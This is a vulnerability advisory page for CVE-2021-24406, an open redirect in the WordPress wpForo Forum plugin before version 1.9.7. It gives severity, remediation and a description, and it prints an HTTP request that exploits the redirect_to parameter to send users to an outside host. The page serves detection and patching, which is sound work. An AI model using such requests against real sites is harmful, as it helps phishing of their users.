🔙 목록으로 돌아가기

CVE-2021-24406: WordPress wpForo Forum < 1.9.7 - Open Redirect

TitleWordPress wpForo Forum < 1.9.7 - Open Redirect
Author0x_Akoko
SeverityMedium
ImpactAn attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.
RemediationUpdate wpForo Forum to version 1.9.7 or later to fix the open redirect vulnerability.
CVSS Score6.1
EPSS Score0.08523
CVE IDCVE-2021-24406
CWE IDCWE-601
Tags cve2021 cve wpscan wordpress redirect gvectors vuln

🔍 Vulnerability Description

WordPress wpForo Forum < 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.

🌐 HTTP Request

GET /community/?foro=signin&redirect_to=https://interact.sh/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24406.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24406.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A